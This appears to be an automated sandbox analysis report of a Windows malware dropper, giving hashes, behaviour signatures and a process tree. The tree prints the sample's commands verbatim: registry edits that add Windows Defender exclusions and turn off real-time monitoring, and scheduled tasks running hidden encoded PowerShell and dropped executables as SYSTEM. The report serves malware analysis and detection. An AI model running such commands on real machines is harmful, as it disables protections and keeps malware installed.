Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
02/02/2023, 16:11
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
8dda07df050a4ec819166e017f89531d
-
SHA1
1e77cc63ce92671ae88914fdd9913b4b783c60af
-
SHA256
46790cddcb4afe5315d60e343cf02917fec3466ad902302d03fb0876bf12d313
-
SHA512
0146a817cca81f659987762eff2f0f815ff07e8f4ada5aacab67881e436525d4c15477d376702eba43f7ec96c12218a1bd9cf31ac41a8ab4c1d880d353ba970b
-
SSDEEP
196608:91OFZEjQWk8PRLhfoBSM0RTb1cB8OJqi+DKUKhQKdwM:3OFZEldv55K8OJz+cZ
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 9 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 19 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS1F25.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS2B55.tmp\Install.exe.\Install.exe /S /site_id "385111"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggTRqrpHu" /SC once /ST 12:31:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggTRqrpHu"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggTRqrpHu"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxiaabwVXPExYdJTLC" /SC once /ST 17:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kRLCUbwYATZBDbHkg\YfTMuvwSzqoKHZV\xNKtKFq.exe\" aR /site_id 385111 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B366B78F-2DBB-4E64-9477-E439FE4537CE} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {880E051E-2153-4C86-B6A2-F1A2E6B81629} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\kRLCUbwYATZBDbHkg\YfTMuvwSzqoKHZV\xNKtKFq.exeC:\Users\Admin\AppData\Local\Temp\kRLCUbwYATZBDbHkg\YfTMuvwSzqoKHZV\xNKtKFq.exe aR /site_id 385111 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFfrstQgi" /SC once /ST 15:14:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFfrstQgi"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFfrstQgi"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkGJjsoyd" /SC once /ST 12:56:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkGJjsoyd"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkGJjsoyd"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\fGjIrJkbIWacuYsE\GIpfDVQw\XqZsxRtSgXDLbEQl.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\fGjIrJkbIWacuYsE\GIpfDVQw\XqZsxRtSgXDLbEQl.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AwyklTHDU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AwyklTHDU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BMiprIMoSJUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BMiprIMoSJUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DExmmXYjpjEAC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DExmmXYjpjEAC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\llUTaFzUGHfSWLjQOrR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\llUTaFzUGHfSWLjQOrR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sEUijaImlLDU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sEUijaImlLDU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zxMrnItEVGjmkVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zxMrnItEVGjmkVVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kRLCUbwYATZBDbHkg" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kRLCUbwYATZBDbHkg" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AwyklTHDU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AwyklTHDU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BMiprIMoSJUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BMiprIMoSJUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DExmmXYjpjEAC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DExmmXYjpjEAC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\llUTaFzUGHfSWLjQOrR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\llUTaFzUGHfSWLjQOrR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sEUijaImlLDU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sEUijaImlLDU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zxMrnItEVGjmkVVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zxMrnItEVGjmkVVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kRLCUbwYATZBDbHkg" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kRLCUbwYATZBDbHkg" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fGjIrJkbIWacuYsE" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUEHtipSw" /SC once /ST 08:30:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUEHtipSw"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUEHtipSw"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qfjaEBkGUlGShblRK" /SC once /ST 08:26:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fGjIrJkbIWacuYsE\rvaawYfKrlVLBop\CuXqExg.exe\" tU /site_id 385111 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qfjaEBkGUlGShblRK"3⤵
-
-
-
C:\Windows\Temp\fGjIrJkbIWacuYsE\rvaawYfKrlVLBop\CuXqExg.exeC:\Windows\Temp\fGjIrJkbIWacuYsE\rvaawYfKrlVLBop\CuXqExg.exe tU /site_id 385111 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bxiaabwVXPExYdJTLC"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AwyklTHDU\TVczMA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fiXWxnGyiwPSftV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1790630832-132566647181569072586921245-950790109-128274250231297708036556067"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20246825633921698361447789141-1316026153122941166416871282502029536156-831878112"1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.2MB
MD5f0bebba9913fb9a00da5027f1da54724
SHA14c5fa7c0f9d70dad094bd87872eb1beb092cc61b
SHA25654fc127bdca46210d96eba0a653aed82dd8450b55edd65d282fc265820f2ab78
SHA512f40498884df13125da51f67fe359a7f7b1cde4386a289a0ff4d69c8a87fa7709e449d42c9465ffe02cedf997089d540cfbfc1d7acc63c89fdf6572273df8f644
-
Filesize
6.2MB
MD5f0bebba9913fb9a00da5027f1da54724
SHA14c5fa7c0f9d70dad094bd87872eb1beb092cc61b
SHA25654fc127bdca46210d96eba0a653aed82dd8450b55edd65d282fc265820f2ab78
SHA512f40498884df13125da51f67fe359a7f7b1cde4386a289a0ff4d69c8a87fa7709e449d42c9465ffe02cedf997089d540cfbfc1d7acc63c89fdf6572273df8f644
-
Filesize
6.7MB
MD57b537b50f47f921314d9a299175c374a
SHA1be4565d80eee52800ee95156967501fb2d539f52
SHA2567c017e9178f8f5d4bcb511c5e8473547a652d9369c9f83d1e9eae1ee75d9c62b
SHA512f4ba2e40bae944def0a3a924297b69fbd6844c7d2b149cba758df80bfad066e0f003c5247049d99baa56760f77dee1d883335222df7ad5400433b93b576c32b2
-
Filesize
6.7MB
MD57b537b50f47f921314d9a299175c374a
SHA1be4565d80eee52800ee95156967501fb2d539f52
SHA2567c017e9178f8f5d4bcb511c5e8473547a652d9369c9f83d1e9eae1ee75d9c62b
SHA512f4ba2e40bae944def0a3a924297b69fbd6844c7d2b149cba758df80bfad066e0f003c5247049d99baa56760f77dee1d883335222df7ad5400433b93b576c32b2
-
Filesize
6.7MB
MD57b537b50f47f921314d9a299175c374a
SHA1be4565d80eee52800ee95156967501fb2d539f52
SHA2567c017e9178f8f5d4bcb511c5e8473547a652d9369c9f83d1e9eae1ee75d9c62b
SHA512f4ba2e40bae944def0a3a924297b69fbd6844c7d2b149cba758df80bfad066e0f003c5247049d99baa56760f77dee1d883335222df7ad5400433b93b576c32b2
-
Filesize
6.7MB
MD57b537b50f47f921314d9a299175c374a
SHA1be4565d80eee52800ee95156967501fb2d539f52
SHA2567c017e9178f8f5d4bcb511c5e8473547a652d9369c9f83d1e9eae1ee75d9c62b
SHA512f4ba2e40bae944def0a3a924297b69fbd6844c7d2b149cba758df80bfad066e0f003c5247049d99baa56760f77dee1d883335222df7ad5400433b93b576c32b2
-
Filesize
7KB
MD54cc54d5f902a6ef2c7906644e4280e56
